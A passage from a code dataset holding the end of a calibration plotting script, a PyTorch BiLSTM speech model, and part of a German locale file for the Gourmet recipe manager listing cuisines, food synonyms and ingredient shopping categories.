+ p[deg] \r\n#print 'y = ' + str(p[0]) + 'x + ' + str(p[1])\r\n","repo_name":"liliangr/cachita","sub_path":"scripts/PTZ Calibration/Graphics4CalibratorResults.py","file_name":"Graphics4CalibratorResults.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39766698741","text":"import torch\nfrom torch import nn\nfrom collections import OrderedDict\nfrom torch.nn.utils.rnn import *\n\n\nclass BiLSTM(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, num_layers, use_gpu=False):\n super().__init__()\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.num_layers = num_layers\n self.use_gpu = use_gpu\n\n self.input_layers = nn.Sequential(OrderedDict([\n (\"conv_1d\", nn.Conv1d(input_size, hidden_size * 2, 5, stride=1, padding=2)),\n ('relu', nn.ReLU())\n ]))\n\n self.lstm = nn.LSTM(\n input_size=hidden_size * 2,\n hidden_size=hidden_size,\n num_layers=num_layers,\n bidirectional=True,\n batch_first=False\n )\n\n self.output_layer = nn.Sequential(OrderedDict([\n (\"linear_0\", nn.Linear(hidden_size * 2, 256)),\n (\"relu_0\", nn.ReLU()),\n (\"linear_1\", nn.Linear(256, output_size)),\n ]))\n\n def __call__(self, x, x_len):\n if self.use_gpu:\n x = x.cuda()\n\n x = self.input_layers(x.permute(1, 2, 0)).permute(2, 0, 1)\n packed_X = pack_padded_sequence(x, x_len, enforce_sorted=False)\n packed_out = self.lstm(packed_X)[0]\n out, out_lens = pad_packed_sequence(packed_out)\n out = self.output_layer(out).log_softmax(2)\n\n return out, out_lens\n\n\n","repo_name":"ChiWanZi1898/Utterance2Phoneme","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34692220782","text":"# -*- coding: utf-8 -*-\n# we set up default information for our locale.\n# Translators should use this file as the basis of their translation.\n# Copy this file and rename it for you locale.\n#\n# For example, Spanish uses:\n# defaults_es.py\n#\n# British English uses:\n# defaults_en_GB.py\n#\n# Please fill in the below fields:\n\n# Language: Deutsch (German)\n# Translator:\n# Last-updated: 2005-01-15 (07/18/05)\n\nfrom .abstractLang import AbstractLanguage\nfrom typing import Collection, Mapping, Any\n\nclass Language(AbstractLanguage):\n\n CREDITS = \"\"\n\n #The next line can be used to determine some things about how to handle this language\n LANG_PROPERTIES={'hasAccents':True, 'capitalisedNouns':True,'useFractions':False}\n\n\n # TRANSLATOR WARNING: DO NOT TRANSLATE THE FIELD NAMES: ONLY THE VALUES!!!\n\n # only translate the items in the list [..] (and feel free to create\n # categories that make sense for your locale -- no need to translate\n # these ones). 
DO NOT translate 'cuisine','rating','source' or\n # 'category'\n\n # The below are Gourmet's standard fields and the default categories for them.\n # Do not translate the field names ('cuisine','rating','source,'category').\n # Instead, fill in the list with categories that make sense for your locale.\n # Feel free to change the number or content of categories to be consistent\n # with what users in your locale are likely to be familiar with.\n\n fields={'cuisine': ['deutsch', 'amerikanisch','italienisch','französisch',\n 'mexikanisch','asiatisch','indisch','griechisch','vegetarisch'],\n\n 'rating' : ['5 - ausgezeichnet','4 - lecker',\n '3 - OK','2 - mittelmäßig','1 - vergiss es!',\n '(nicht geprüft)'],\n\n 'source' : [],\n\n 'category' :[\n 'Nachspeise','Vorspeise','Hauptgericht',\n 'Beilage','Salat','Suppe','Frühstück',\n 'Picknick','Andere','Plan'],\n }\n\n # In English, there are a heck of a lot of synonyms. This is a list\n # for those synonyms. [u\"preferred word\",\"alternate word\",\"alternate word\"]\n # If there are none of these that you can think of in your language, just\n # set this to:\n # SYNONYMS=[]\n\n # note from translator: some terms are not standard but used in common langugage, some are used in a fautive manner,\n # I decided to put them in different sections so it is still clear what is a synonym and what should not be a synonym.\n SYNONYMS=[\n # the first item of each list is the default\n [\"Cocktailtomaten\", \"Tomaten, cherry\"],\n [\"Alfaalfa\",\"Alfapha\",\"Luzerne\"],\n [\"Porree\",\"Lauch\"],\n [\"Frühlingszwiebel\",\"Lauch-Zwiebeln\"],\n [\"Zuckermelone\",\"Gartenmelone\"],\n [\"Bleichsellerie\",\"Stangensellerie\", \"Straudensellerie\"],\n [\"Hammelfleisch\",\"Hammel\"],\n [\"Kalbfleisch\",\"Kalb\"],\n [\"Truthahn\",\"Puter\",\"Pute\"],\n [\"Rindfleisch\",\"Rind\"],\n [\"Rotbusch\",\"Rooibos\",\"Rooibosch\"],\n [\"Seelachs\",\"Köhler\"],\n [\"Anschovis\",\"Anchovis\",\"Sardelle\"],\n [\"Kabeljau\",\"Dorsch\"],\n [\"Nutella\", \"Nusspli\"],\n [\"Tomatenmark\",\"Tomatenkonzentrat\"],\n [\"Weizenmehl\",\"Mehl, weiß\"],\n [\"Soja-Milch\",\"Sojamilch\",\"Soya-Milch\", \"Soja Milch\"],\n [\"Soja-Sauce\", \"sauce soja\",\"sauce soya\",\"Soya-Sauce\",\"Sojasoße\", \"Sojasosse\"],\n [\"Soja\",\"Soya\"],\n [\"Sojabohnen\",\"Soyabohnen\"],\n [\"Püree\",\"Kartoffelpüree\"],\n [\"Müsli\",\"Muesli\"],\n [\"Nudeln\",\"Pasta\"],\n [\"Chile\",\"Chili\",\"Chilli\"],\n [\"Zucchini\", \"Zuchini\", \"Courgette\"],\n [\"Tafeltrauben\",\"Trauben, weiß\",\"Trauben, grün\"],\n [\"Garam Masala\",\"Masala\",\"Massala\",\"Garam Massala\"],\n [\"Gemüsebouillon\",\"Gemüsebrühe\"],\n [\"Hühnerbouillon\",\"Hühnerbrühe\"],\n [\"Muskat\",\"Muskatnuss\",\"Muscat\",\"Muscatnuss\"],\n [\"Sesammus\",\"Tahin\"],\n [\"Brokkoli\", \"Broccoli\"],\n [\"Kräuter\",\"gemischte Kräuter\"],\n [\"Langkornreis\",\"Reis\"],\n [\"Eierschwammerl\",\"Pfifferlinge\"],\n [\"Herrenpilze\",\"Steinpilze\"],\n [\"Paradeiser\",\"Tomaten\"],\n\n # Irregular plurals\n [\"Äpfel\",\"Apfel\"],\n [\"Pfirsiche\",\"Pfirsich\"],\n [\"Nüsse\", \"Nuss\"],\n [\"Eier\",\"Ei\"]\n\n #non-standard usage\n\n #fautive/discouraged usages\n ]\n\n # A DICTIONARY CONTAINING INGREDIENT KEYS AND NDBNO for the USDA\n # nutritional database. 
For these items, we will have nutritional\n # information by default.\n\n NUTRITIONAL_INFO: Mapping[str, Any] = {}\n\n # a dictionary for ambiguous words.\n # key=ambiguous word, value=list of possible non-ambiguous terms\n #\n # Translators: if you have a word that has more than one food meaning\n # in your language, you can add an entry as follow\n\n # AMBIGUOUS = {\n # 'word':['meaning1','meaning2','meaning3'],\n # }\n\n AMBIGUOUS = {\n 'Sellerie':['Sellerie','Staudensellerie'],\n }\n\n\n # triplicates ITEM, KEY, SHOPPING CATEGORY\n # These will be defaults.\n\n # They should include whatever foods might be standard for your\n # locale, with whatever sensible default categories you can think of\n # (again, thinking of your locale, not simply translating what I've\n # done).\n\n # Items provided here will automatically be recognized and go onto the\n # given category in a user's shopping list by default.\n\n # Don't feel obligated to translate every item -- especially since not\n # all items will be common for all locales. However, the more items\n # you can put here, the more the user will get the sense that gourmet\n # u\"knows\" about foods that they enter.\n\n # I generated the below list using the wikipedia entry on foods as my\n # starting point. You may want to do something similar for your\n # locale. Also, if the syntax of the below is too complicated, you\n # can send me a list of category headings and ingredients for your\n # locale and I'll do the necessary formatting \n\n INGREDIENT_DATA = [ ## G e m ü s e\n (\"Alfaalfa\", \"Alfalfa\", \"Gemüse\"), # alfalfa sprouts\n (\"Anis\", \"Anis\", \"Gemüse\"), # anise\n (\"Artischocke\", \"Artischocke\", \"Gemüse\"), # artichoke\n (\"Ölranke\", \"Ölranke\", \"Gemüse\"), # rocket\n (\"Spargel\", \"Spargel\", \"Gemüse\"), # asparagus (white)\n (\"weißer Spargel\", \"Spargel, weißer\", \"Gemüse\"), # asparagus - white\n (\"grüner Spargel\", \"Spargel, grüner\", \"Gemüse\"), # asparagus - green\n (\"Aubergine\", \"Aubergine\", \"Gemüse\"), # aubergine\n (\"Avocado\", \"Avocado\", \"Gemüse\"), # avocado\n (\"Brokkoli\", \"Brokkoli\", \"Gemüse\"), # broccoli\n (\"Spinat\", \"Spinat\", \"Gemüse\"), # spinach\n (\"Rosenkohl\", \"Kohl, Rosenkohl\", \"Gemüse\"), # brussels sprouts\n (\"Kohl\", \"Kohl\", \"Gemüse\"), # cabbage\n (\"Weißkohl\", \"Kohl, Weißkohl\", \"Gemüse\"), # white cabbage\n (\"Rotkohl\", \"Kohl, Rotkohl\", \"Gemüse\"), # red cabbage\n (\"Blumenkohl\", \"Kohl, Blumenkohl\", \"Gemüse\"), # cauliflower\n (\"Chinakohl\", \"Kohl, Chinakohl\", \"Gemüse\"), # china cabbage\n (\"Kohlrabi\", \"Kohl, Kohlrabi\", \"Gemüse\"), # kohlrabi\n (\"Grünkohl\", \"Kohl, Grünkohl\", \"Gemüse\"), # kale\n\n (\"Bleichsellerie\", \"Bleichsellerie\", \"Gemüse\"), # celery\n (\"Zitronengras\", \"Zitronengras\", \"Gemüse\"), # lemon grass\n (\"Mais\", \"Mais\", \"Gemüse\"), # corn\n\n (\"Champignons\", \"Champignons\", \"Gemüse\"), # button mushrooms\n (\"Pilze\", \"Pilze\", \"Gemüse\"), # large mushrooms\n (\"Steinpilz\", \"Steinpilze\", \"Gemüse\"), # mushrooms\n (\"Pfifferlinge\", \"Pfifferlinge\", \"Gemüse\"), # other woodland fungus\n\n (\"Senfkeimlinge\", \"Senfkeimlinge\", \"Gemüse\"), # mustard greens\n (\"Brennessel\", \"Brennessel\", \"Gemüse\"), # nettles\n (\"Okra\", \"Okra\", \"Gemüse\"), # okra\n (\"Schnittlauch\", \"Schnittlauch\", \"Gemüse\"), # chives\n\n (\"Zwiebeln\", \"Zwiebeln\", \"Gemüse\"), # onion\n (\"Schalotte\", \"Schalotte\", \"Gemüse\"), # shallot\n (\"Frühlingszwiebel\", \"Frühlingszwiebel\", \"Gemüse\"), # spring onion, 
scallion\n (\"rote Zwiebeln, rot\", \"Zwiebeln, rote\", \"Gemüse\"), # red (spanish) onion\n (\"weiße Zwiebeln\", \"Zwiebeln, weiße\", \"Gemüse\"), # white onion\n (\"gelbe Zwiebeln\", \"Zwiebeln, gelbe\", \"Gemüse\"), # yellow onion\n (\"Metzgerzwiebeln\", \"Zwiebeln, Metzger-\", \"Gemüse\"), # large onion (salad)\n (\"Speisezwiebeln\", \"Zwiebeln, Speise-\", \"Gemüse\"), # standard cooking onion\n (\"Knoblauch\", \"Knoblauch\", \"Gemüse\"), # garlic\n (\"Porree\", \"Porree\", \"Gemüse\"), # leek\n\n (\"Paprika\", \"Paprika\", \"Gemüse\"), # pepper\n (\"rote Paprika\", \"Paprika, rote\", \"Gemüse\"), # red bell pepper\n (\"grüne Paprika\", \"Paprika, grüne\", \"Gemüse\"), #\n (\"gelbe Paprika\", \"Paprika, gelbe\", \"Gemüse\"), #\n (\"Chile\", \"Chile\", \"Gemüse\"), # chilli pepper\n (\"Jalapeño-Chile\", \"Chile, Jalapeño\", \"Gemüse\"), # jalapeño pepper\n (\"Habanero-Chile\", \"Chile, Habanero\", \"Gemüse\"), # habanero pepper\n\n (\"Radieschen\", \"Radieschen\", \"Gemüse\"), # radish\n (\"Rote Beet\", \"Rote Beet\", \"Gemüse\"), # beetroot\n (\"Möhren\", \"Möhren\", \"Gemüse\"), # carrot\n (\"Rettich\", \"Rettich\", \"Gemüse\"), # horse radish\n (\"Wasabi\", \"Wasabi\", \"Gemüse\"), # japanese horseraddish\n (\"Sellerie\", \"Sellerie\", \"Gemüse\"), # celeriac\n (\"Pastinake\", \"Pastinake\", \"Gemüse\"), # parsnip\n (\"Kohlrübe\", \"Kohlrübe\", \"Gemüse\"), # turnip\n (\"Fenchel\", \"Fenchel\", \"Gemüse\"), # fennel\n\n (\"Kopfsalat\", \"Kopfsalat\", \"Gemüse\"), # lettuce\n (\"Rucolasalat\", \"Rucolasalat\", \"Gemüse\"), # rucola\n (\"Friseesalat\", \"Friseesalat\", \"Gemüse\"), # open lettuce\n (\"Feldsalat\", \"Feldesalat\", \"Gemüse\"), # lettuce\n\n (\"Saubohnen\", \"Saubohnen\", \"Gemüse\"), # broad beans\n (\"Bobby Bohnen\", \"Bobby Bohnen\", \"Gemüse\"), # small green beans\n (\"Haricots\", \"Haricots\", \"Gemüse\"), # haricot beans\n (\"Carbasc\", \"Carbasc\", \"Gemüse\"), # runner beans\n (\"Erbsen\", \"Erbsen\", \"Gemüse\"), # peas\n (\"Zuckererbsen\", \"Zuckererbsen\", \"Gemüse\"), # mange tous\n\n (\"Zucchini\", \"Zucchini\", \"Gemüse\"), # zucchini\n (\"Gurke (Salat-)\", \"Gurke (Salat-)\", \"Gemüse\"), # cucumber\n\n (\"Kürbis\", \"Kürbis\", \"Gemüse\"), # pumpkin\n\n (\"Cocktailtomaten\", \"Tomaten, Cocktail-\", \"Gemüse\"), # cocktail (cherry) tomato\n (\"Tomaten\", \"Tomaten\", \"Gemüse\"), # cherry tomato\n (\"Rispentomaten\", \"Tomaten, Rispen-\", \"Gemüse\"), # tomato on stems\n\n (\"Kartoffel\", \"Kartoffel\", \"Gemüse\"), # potato\n (\"Speisekartoffeln\", \"Kartoffeln, Speise-\", \"Gemüse\"), # standard cooking potatoes\n (\"Süßkartoffel\", \"Süßkartoffel\", \"Gemüse\"), # sweet potato\n\n (\"Jamswurzel\", \"Jamswurzel\", \"Gemüse\"), # yam\n (\"Wasserkastanie\", \"Wasserkastanie\", \"Gemüse\"), # water chestnut\n (\"Brunnenkresse\", \"Brunnenkresse\", \"Gemüse\"), # watercress\n\n (\"Oliven\", \"Oliven\", \"Gemüse\"), #\n (\"grüne Oliven\", \"Oliven, grüne\", \"Gemüse\"), #\n (\"schwarze Oliven\", \"Oliven, schwarze\", \"Gemüse\"), #\n\n ## H ü l s e n f r u c h t e\n (\"grüne Bohnen\", \"Bohnen, grüne\", \"Gemüse\"), # green beans\n (\"weiße Bohnen\", \"Bohnen, weiße\", \"Hülsenfrüchte\"), # green beans\n (\"Azuki Bohnen\", \"Bohnen, Azuki\", \"Hülsenfrüchte\"), # azuki beans\n (\"schwarze Bohnen\", \"Bohnen, schwarze\", \"Hülsenfrüchte\"), # black beans\n (\"Borlottibohnen\", \"Bohnen, Borlotti-\", \"Hülsenfrüchte\"), # borlotti beans (not sure)\n (\"Kichererbsen\", \"Kichererbsen\", \"Hülsenfrüchte\"), # chickpeas, garbanzos, or ceci beans\n 
(\"Kidneybohnen\", \"Bohnen, Kidney-\", \"Hülsenfrüchte\"), # kidney beans\n (\"Teller-Linsen\", \"Linsen, Teller-\", \"Hülsenfrüchte\"), # standard lentils\n (\"rote Linsen\", \"Linsen, rote\", \"Hülsenfrüchte\"), # red lentils\n (\"grüne Linsen\", \"Linsen, grüne\", \"Hülsenfrüchte\"), # green lentils\n (\"schwarze Linsen\", \"Linsen, schwarze\", \"Hülsenfrüchte\"), # black lentils\n (\"Gartenbohnen\", \"Gartenbohnen\", \"Gemüse\"), # lima bean or butter bean\n (\"Mungbohnen\", \"Bohnen, Mung-\", \"Hülsenfrüchte\"), # mung beans\n (\"Sojabohnen\", \"Bohnen, Soja-\", \"Hülsenfrüchte\"), # soybeans\n (\"grüne Erbsen\", \"Erbsen, grüne\", \"Hülsenfrüchte\"), # green dried peas\n (\"gelbe Erbsen\", \"Erbsen, gelbe\", \"Hülsenfrüchte\"), # yellow dried peas\n (\"Schälerbsen\", \"Erbsen, Schälerbsen\", \"Hülsenfrüchte\"), #\n\n ## F r u c h t e\n (\"Obst\", \"Obst\", \"Obst\"), # general fruit\n (\"Äpfel\", \"Äpfel\", \"Obst\"), # apple\n (\"rote Äpfel\", \"Äpfel, rote\", \"Obst\"), #\n (\"goldene Äpfel\", \"Äpfel, goldene\", \"Obst\"), #\n (\"Granny Smith Äpfel\", \"Äpfel, Granny Smith\", \"Obst\"), #\n (\"Fuji Äpfel\", \"Äpfel, Fuji-\", \"Obst\"), #\n (\"grüne Äpfel\", \"Äpfel, grüne\", \"Obst\"), # green apple\n (\"Granatäpfel\", \"Granatäpfel\", \"Obst\"), # pomegranate\n (\"Quitte\", \"Quitte\", \"Obst\"), # quince\n (\"Hagebutten\", \"Hagebutten\", \"Obst\"), # rose hip\n (\"Aprikosen\", \"Aprikosen\", \"Obst\"), # apricot\n (\"Birnen\", \"Birnen\", \"Obst\"), # pear\n (\"Conference Birnen\", \"Birnen, Conference\", \"Obst\"), # pear, large conference\n (\"William Birnen\", \"Birnen, William\", \"Obst\"), # pear, standard william\n (\"Kirschen\", \"Kirschen\", \"Obst\"), # cherry\n (\"Pflaumen\", \"Pflaumen\", \"Obst\"), # plum\n (\"Pfirsiche\", \"Pfirsiche\", \"Obst\"), # peach\n (\"Nektarinen\", \"Nektarinen\", \"Obst\"), # nectarine\n (\"Brombeeren\", \"Beeren, Brombeeren\", \"Obst\"), # blackberry\n (\"Himbeeren\", \"Beeren, Himbeeren\", \"Obst\"), # raspberry\n (\"Erdbeeren\", \"Beeren, Erdbeeren\", \"Obst\"), # raspberry\n (\"Heidelbeeren\", \"Beeren, Heidelbeeren\", \"Obst\"), # bilberry\n (\"Blaubeeren\", \"Beeren, Blaubeeren\", \"Obst\"), # blueberry\n (\"Preiselbeeren\", \"Beeren, Preiselbeeren\", \"Obst\"), # cranberry\n (\"Johannisbeeren\", \"Beeren, Johannisbeeren\", \"Obst\"), # red currant\n (\"schwarze Johannisbeeren\", \"Beeren, schwarze Johannisbeeren\", \"Obst\"), # black currant\n (\"Holunderbeeren\", \"Beeren, Holunderbeeren\", \"Obst\"), # elderberry\n (\"Stachelbeeren\", \"Stachelbeeren\", \"Obst\"), # gooseberry\n (\"Kiwi\", \"Kiwi\", \"Obst\"), # kiwi fruit\n (\"Papaya\", \"Papaya\", \"Obst\"), # pawpaw\n (\"Zuckermelonen\", \"Zucker-\", \"Obst\"), # cantaloupe\n (\"Honigmelonen\", \"Melonen, Honig-\", \"Obst\"), # honeydew melon\n (\"Galiamelonen\", \"Melonen, Galia-\", \"Obst\"), # galia melon\n (\"Netzmelonen\", \"Melonen, Netz-\", \"Obst\"), # net melon\n (\"Wassermelonen\", \"Melonen, Wasser-\", \"Obst\"), # watermelon\n (\"Feigen\", \"Feigen\", \"Obst\"), # fig\n (\"Weintrauben\", \"Weintrauben\", \"Obst\"), # grape\n (\"Tafeltrauben\", \"Weintrauben, Tafel\", \"Obst\"), # green grapes\n (\"blaue Weintrauben\", \"Weintrauben, blau\", \"Obst\"), # black grapes\n (\"Datteln\", \"Datteln\", \"Obst\"), # date\n (\"Grapefruit\", \"Grapefruit\", \"Obst\"), # grapefruit\n (\"Limetten\", \"Limetten\", \"Obst\"), # lime\n (\"Kumquat\", \"Kumquat\", \"Obst\"), # kumquat\n (\"Zitronen\", \"Zitronen\", \"Obst\"), # lemon\n (\"Mandarinen\", \"Mandarinen\", \"Obst\"), # 
mandarin\n (\"Klementinen\", \"Klementinen\", \"Obst\"), # clementine\n (\"Tangerinen\", \"Tangerinen\", \"Obst\"), # tangerine\n (\"Orangen\", \"Orangen\", \"Obst\"), # orange\n (\"Ugli\", \"Ugli\", \"Obst\"), # ugli fruit\n (\"Guave\", \"Guave\", \"Obst\"), # guava\n (\"Litschi\", \"Litschi\", \"Obst\"), # lychee\n (\"Passionsfrucht\", \"Passionsfrucht\", \"Obst\"), # passion fruit\n (\"Banane\", \"Banane\", \"Obst\"), # banana\n (\"Wegerich\", \"Wegerich\", \"Obst\"), # plantain\n (\"Kokosnuss\", \"Kokosnuss\", \"Obst\"), # coconut\n (\"Durion\", \"Durion\", \"Obst\"), # durian\n (\"Mango\", \"Mangue\", \"Obst\"), # mango\n (\"Papaya\", \"Papaya\", \"Obst\"), # papaya\n (\"Ananas\", \"Ananas\", \"Obst\"), # pineapple\n (\"Tamarinde\", \"Tamarinde\", \"Obst\"), # tamarind\n (\"Rhabarber\", \"Rhabarber\", \"Obst\"), # rhubarb\n\n ## M e e r e s f r ü c h t e\n (\"Anchovis\", \"Anchovis\", \"Meeresfrüchte\"), # anchovy\n (\"Barsch\", \"Barsch\", \"Meeresfrüchte\"), # bass\n (\"Kugelfisch\", \"Kugelfisch\", \"Meeresfrüchte\"), # blowfish\n (\"Wels\", \"Wels\", \"Meeresfrüchte\"), # catfish\n (\"Dorsch\", \"Dorsch\", \"Meeresfrüchte\"), # cod\n (\"Aal\", \"Aal\", \"Meeresfrüchte\"), # eel\n (\"Flunder\", \"Flunder\", \"Meeresfrüchte\"), # flounder\n (\"Schellfisch\", \"Schellfisch\", \"Meeresfrüchte\"), # haddock\n (\"Haddock\", \"Haddock\", \"Meeresfrüchte\"), # smoked haddock\n (\"Heilbutt\", \"Heilbutt\", \"Meeresfrüchte\"), # halibut\n (\"Zander\", \"Zander\", \"Meeresfrüchte\"), # pike\n (\"Seelachs\", \"Seelachs\", \"Meeresfrüchte\"), # pollock\n (\"Sardine\", \"Sardine\", \"Meeresfrüchte\"), # sardine\n (\"Sprotte\", \"Sprotte\", \"Meeresfrüchte\"), # sprat\n (\"Lachs\", \"Lachs\", \"Meeresfrüchte\"), # salmon\n (\"Sägebarsch\", \"Sägebarsch\", \"Meeresfrüchte\"), # sea bass\n (\"Hai\", \"Hai\", \"Meeresfrüchte\"), # shark\n (\"Seezunge\", \"Seezunge\", \"Meeresfrüchte\"), # sole\n (\"Stör\", \"Stör\", \"Meeresfrüchte\"), # sturgeon\n (\"Schwertfisch\", \"Schwertfisch\", \"Meeresfrüchte\"), # swordfish\n (\"Forelle\", \"Forelle\", \"Meeresfrüchte\"), # trout\n (\"Thunfisch\", \"Thunfisch\", \"Meeresfrüchte\"), # tuna\n (\"Weißfisch\", \"Weißfisch\", \"Meeresfrüchte\"), # whitefish\n (\"Wittling\", \"Wittling\", \"Meeresfrüchte\"), # whiting\n (\"Rogen\", \"Rogen\", \"Meeresfrüchte\"), # roe of fish\n (\"Kaviar\", \"Kaviar\", \"Meeresfrüchte\"), # caviar\n (\"Krebs\", \"Krebs\", \"Meeresfrüchte\"), # crab\n (\"Hummer\", \"Hummer\", \"Meeresfrüchte\"), # lobster\n (\"Garnele\", \"Garnele\", \"Meeresfrüchte\"), # prawns\n (\"Krabbe\", \"Krabbe\", \"Meeresfrüchte\"), # shrimp\n (\"Klaffmuschel\", \"Klaffmuschel\", \"Meeresfrüchte\"), # clam\n (\"Muschel\", \"Muschel\", \"Meeresfrüchte\"), # mussel\n (\"Tintenfisch\", \"Tintenfisch\", \"Meeresfrüchte\"), # octopus\n (\"Auster\", \"Auster\", \"Meeresfrüchte\"), # oyster\n (\"Schnecke\", \"Schnecke\", \"Meeresfrüchte\"), # snail\n (\"Kalmar\", \"Kalmar\", \"Meeresfrüchte\"), # squid\n (\"Kammuschel\", \"Kammuschel\", \"Meeresfrüchte\"), # scallop\n\n ## F l e i s c h\n (\"Speck\", \"Speck\", \"Fleisch\"), # chopped bacon\n (\"Bacon\", \"Bacon\", \"Fleisch\"), # bacon\n (\"Schinken\", \"Schinken\", \"Fleisch\"), # ham\n (\"Hammel\", \"Hammel\", \"Fleisch\"), # mutton\n (\"Lamm\", \"Lamm\", \"Fleisch\"), # lamb\n (\"Kalb\", \"Kalb\", \"Fleisch\"), # veal\n (\"Steak\", \"Steak\", \"Fleisch\"), # steak\n (\"Hamburger\", \"Hamburger\", \"Fleisch\"), # hamburger\n (\"Roastbeef\", \"Roastbeef\", \"Fleisch\"), # roast beef\n (\"Hähnchen\", 
\"Hähnchen\", \"Fleisch\"), # chicken\n (\"Pute\", \"Pute\", \"Fleisch\"), # turkey\n (\"Ente\", \"Ente\", \"Fleisch\"), # duck\n (\"Gans\", \"Gans\", \"Fleisch\"), # goose\n (\"Rind\", \"Rind\", \"Fleisch\"), # beef\n (\"Hackfleisch\", \"Hackfleisch\", \"Fleisch\"), # mince beef\n (\"Hase\", \"Hase\", \"Fleisch\"), # hare\n (\"Kaninchen\", \"Kaninchen\", \"Fleisch\"), # rabbit\n (\"Hirsch\", \"Hirsch\", \"Fleisch\"), # deer\n (\"Hühnerbrust\", \"Hühnerbrust\", \"Fleisch\"), # chicken breast\n (\"Schweinefleisch\", \"Schweinefleisch\", \"Fleisch\"), # pork\n (\"Chorizo\", \"Chorizo\", \"Fleisch\"), # chorizo\n (\"Salami\", \"Salami\", \"Fleisch\"), # salami\n (\"Wurst\", \"Wurst\", \"Fleisch\"), # sausage\n (\"Bratwurst\", \"Bratwurst\", \"Fleisch\"), # sausage\n (\"Weißwurst\", \"Weißwurst\", \"Fleisch\"), # sausage\n (\"Currywurst\", \"Currywurst\", \"Fleisch\"), # sausage\n\n ## L e b e n s m i t t e l\n (\"Weizenmehl\", \"Mehl, Weizen-\", \"Lebensmittel\"), # all purpose flour\n (\"Vollkorn Weizenmehl\", \"Mehl, Vollkorn Weizen-\", \"Lebensmittel\"), # wholemeal flour\n (\"Hirsemehl\", \"Mehl, Hirse-\", \"Lebensmittel\"), # flour\n (\"Roggenmischung\", \"Mehl, Roggenmischung\", \"Lebensmittel\"), # rye flour\n (\"Backpulver\", \"Backpulver\", \"Lebensmittel\"), # baking powder\n (\"Natron\", \"Natron\", \"Lebensmittel\"), # baking soda\n (\"Schokolade\", \"Schokolade\", \"Lebensmittel\"), # chocolate\n (\"Schokotröpfen\", \"Schokotröpfen\", \"Lebensmittel\"), # chocolate chips\n (\"Zucker\", \"Zucker\", \"Lebensmittel\"), # suger\n (\"Süßstoff\", \"Süßstoff\", \"Lebensmittel\"), # artificial sweetner\n (\"brauner Zucker\", \" Zucker, braun\", \"Lebensmittel\"), # brown suger\n (\"weißer Zucker\", \"Zucker, weiß\", \"Lebensmittel\"), # white sugar\n (\"Raffinade\", \"Zucker, Raffinade\", \"Lebensmittel\"), # castor sugar\n (\"Salz\", \"Salz\", \"Lebensmittel\"), # salt\n (\"Meersalz\", \"Salz, Meer-\", \"Lebensmittel\"), # sea salt\n (\"Rosinen\", \"Rosinen\", \"Lebensmittel\"), # currents\n (\"Sultanienen\", \"Sultanienen\", \"Lebensmittel\"), # sultanas\n (\"geraspelte Kokosnuss\", \"Kokosnuss, geraspelt\", \"Lebensmittel\"), # (modifier?)\n (\"Vanille\", \"Vanille\", \"Lebensmittel\"), # vanilla\n (\"Vanilleessenz\", \"Vanilleessenz\", \"Lebensmittel\"), # vanilla extract\n (\"Walnusskerne\", \"Walnusskerne\", \"Lebensmittel\"), # walnut\n (\"Cashewnüsse\", \"Cashewnüsse\", \"Lebensmittel\"), # cashew nut\n (\"Mandeln\", \"Mandeln\", \"Lebensmittel\"), # almonds\n (\"Erdnüsse\", \"Erdnüsse\", \"Lebensmittel\"), # peanut\n (\"Kartoffelpüree\", \"Kartoffelpüree\", \"Lebensmittel\"), # potato mash\n (\"Klöße\", \"Klöße\", \"Lebensmittel\"), # potato dumplings\n (\"Polenta\", \"Polenta\", \"Lebensmittel\"), # yellow cornmeal\n (\"kernige Haferflocken\", \"Haferflocken, kernig\", \"Lebensmittel\"), # rolled oats\n (\"zarte Haferflocken\", \"Haferflocken, zart\", \"Lebensmittel\"), # fine rolled oats\n (\"Ketchup\", \"Ketchup\", \"Lebensmittel\"), # ketchup\n (\"Mayonnaise\", \"Mayonnaise\", \"Lebensmittel\"), # mayonnaise\n (\"Knäckebrot\", \"Knäckebrot\", \"Lebensmittel\"), # ryebread wafers\n (\"Dosentomaten\", \"Tomaten, Dosen-\", \"Lebensmittel\"), # canned tomatoes\n (\"Dosenmais\", \"Mais, Dosen-\", \"Lebensmittel\"), # canned sweetcorn\n\n (\"Sonnenblumenkerne\", \"Sonnenblumenkerne\", \"Lebensmittel\"), # sunflower seeds\n (\"Sesammus\", \"Sesammus\", \"Lebensmittel\"), # sesame seeds\n\n (\"Zitronensaft\", \"Zitronensaft\", \"Lebensmittel\"), # lemon juice\n 
(\"Zitronenkonzentrat\", \"Zitronenkonzentrat\", \"Lebensmittel\"), # lemon concentrate\n (\"Limettensaft\", \"Saft, Limetten-\", \"Lebensmittel\"), # lime juice\n (\"Orangensaft\", \"Saft, Orangen\", \"Lebensmittel\"), # whole orange juice\n (\"Orangennektar\", \"Saft, Orangennektar\", \"Lebensmittel\"), # orange juice\n\n (\"Tomatensuppe\", \"Tomatensuppe\", \"Lebensmittel\"), # tomato sauce\n (\"Bouillon\", \"Bouillon\", \"Lebensmittel\"), # broth\n (\"Gemüsebouillon\", \"Bouillon, Gemüse-\", \"Lebensmittel\"), # vegetable broth\n (\"Hühnerbouillon\", \"Bouillon, Hühner-\", \"Lebensmittel\"), # broth, chicken\n (\"Hollandaise\", \"Hollandaise\", \"Lebensmittel\"), # hollandais sauce\n\n (\"gehackte Tomaten\", \"Tomaten, gehackt\", \"Lebensmittel\"), # chopped tomato\n (\"geschälte Tomaten\", \"Tomaten, geschält\", \"Lebensmittel\"), # peeled tomato\n (\"passierte Tomaten\", \"Tomaten, passiert\", \"Lebensmittel\"), # mashed tomato\n (\"Tomatenmark\", \"Tomatenmark\", \"Lebensmittel\"), # pureed tomato\n\n (\"Kekse\", \"Kekse\", \"Lebensmittel\"), # biscuits\n (\"Müsli\", \"Müsli\", \"Lebensmittel\"), # muesli\n (\"Pudding\", \"Pudding\", \"Lebensmittel\"), # instant custard pudding\n (\"Stärke\", \"Stärke\", \"Lebensmittel\"), # corn starch\n\n ## R e i s u n d T e i g w a r e n\n (\"Nudeln\", \"Nudeln\", \"Reis & Teigwaren\"), # pasta\n (\"Spaghetti\", \"Spagghetti\", \"Reis & Teigwaren\"), # 